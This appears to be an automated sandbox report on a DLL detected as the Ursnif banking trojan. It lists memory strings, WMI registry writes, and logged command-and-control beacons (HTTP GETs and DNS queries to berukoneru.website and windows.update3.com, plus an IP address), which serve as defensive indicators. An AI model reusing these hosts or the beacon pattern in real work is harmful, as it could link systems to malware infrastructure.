Source: rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/O
Source: regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/j
Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363514151.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/jP
Source: regsvr32.exe, 00000002.00000003.362160768.00000000033C0000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9on
Source: rundll32.exe, 00000004.00000003.365155224.0000000000FF2000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHY
Source: rundll32.exe, 00000004.00000003.365155224.0000000000FF2000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP7
Source: loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCA
Source: regsvr32.exe, 00000002.00000003.362615512.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/65
Source: regsvr32.exe, 00000002.00000003.372829342.000000000335B000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL
Source: rundll32.exe, 00000003.00000003.362882057.00000000008D7000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/tyi
Source: rundll32.exe, 00000004.00000003.372839349.0000000000FF2000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website:443/tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6
Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website:443/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQ
Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: rundll32.exe, 00000004.00000003.316654509.0000000000FFE000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xdax"
Source: 6.dll	String found in binary or memory: https://nodejs.org0
Source: loaddll32.exe, 00000000.00000003.317582164.000000000139F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317644552.00000000013B1000.00000004.00000001.sdmp	String found in binary or memory: https://statics-marketingsites-eus-ms-com.akamaized.net/statics/override.css
Source: regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361019833.0000000003383000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp	String found in binary or memory: https://windows.update3.com/
Source: regsvr32.exe, 00000002.00000003.361178760.000000000335B000.00000004.00000001.sdmp	String found in binary or memory: https://windows.update3.com/tire/clW2f_2FhATNrnqvBey5XJ/HMTv6hdufnhb6/_2BVSemT/sKeyn9puL2fpAeyTFFwZv
Source: rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp	String found in binary or memory: https://windows.update3.com/tire/h5hri2qU3j_2/FtKGoeU1cGb/_2B9_2FVlXXJXe/pIon3PPVjwV3l856n6O1d/JfgtT
Source: 6.dll	String found in binary or memory: https://www.digicert.com/CPS0
Source: 6.dll	String found in binary or memory: https://www.globalsign.com/repository/0
Source: 6.dll	String found in binary or memory: https://www.globalsign.com/repository/03

Source: unknown

DNS traffic detected: queries for: windows.update3.com

Source: global traffic	HTTP traffic detected: GET /tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/fGFKjH5BjbdZz4tmUO5m/ZAUfPXxElw8Dkm9Cfh9/xqmrK6ieQrOr54I1y1Md2B/CJZjvCZRXK_2B/c6YLK40A/ibGCXB5z8qRJaf9iUFEBazW/9sEXIVndb3/DsRsV2z8TCrjx7mBI/rTZxp021lQBU/ESMggS1gJ_2/Bi3Bcj9_2B8Xf4/Xr9j2PgVhY9_2FzIeDatB/WE3DM_2B4ZBLmr9g/bExshi993/JbJC0wJJ/U.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAo/f_2Bdm0MJPWq7ugWEYUqSU/PtgL_2FeeZv0h/UCRQYI_2/FefNYP32vk23pbK3jV8vqXP/0Ovr3EWUID/eiKH_2Fkr5cf0tXqX/_2BscW0pxtbY/lmzrmCcsUPq/Hp_2BA_2BliXkb/fgGnQnQH8/_2B.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP71/7NSaKdzhGeEI1UdiPa/8FnVHvkbS/kpLNStxRjAnliuJ5EZNG/gq3G4NvVU_2BCUhovI0/u7jwUo5n_2BL68IOoZxv34/oRctSCfqONUBa/hRxyIlRY/aB2W4yGH6sVrPB1xJM1YXlq/jJC_2B1iv6kvD5/bMsiwtIS.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/o4Wh2yGKlAclIXiSKni/E2GRbJwAfyjZDLvIiDUTZP/MYjyQpBnAiuxp/RCS8IZuc/T6rd9RjJyTuIO59AdkBUbyh/AeLhgjzVcK/R628sGYn00PGPEGL1/qe_2FhyY_2B4/KAdwjy0pLGn/wY1nXPl9lZfHBx/mKriUsf47w97_2F05n24c/_2B3uV0T1ULXF_2F/rws1Po8g_2B5W/rqgHz.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6ImzPG/nqeMvnB_2B/0lgxK72Q_2BWOlTx_/2BHVUq8DywzL/dSOEptmJdkD/639IuGSCq9GXlR/PUHxRfZnx0Of7xPsoVOC_/2FTMAnj0YKLpX9By/omZGYbxoocAN6vP/PuGPVsc2wwxbBsmHOU/YqsK1vpPn/dCIkRouQqQLmE/5L.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website

Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49808 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

System Summary:

PE file has a writeable .text section

Source: 6.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Writes or reads registry keys via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Uses 32bit PE files

Source: 6.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F1B084	4_2_00F1B084
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F13373	4_2_00F13373
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F1294D	4_2_00F1294D

Contains functionality to call native functions

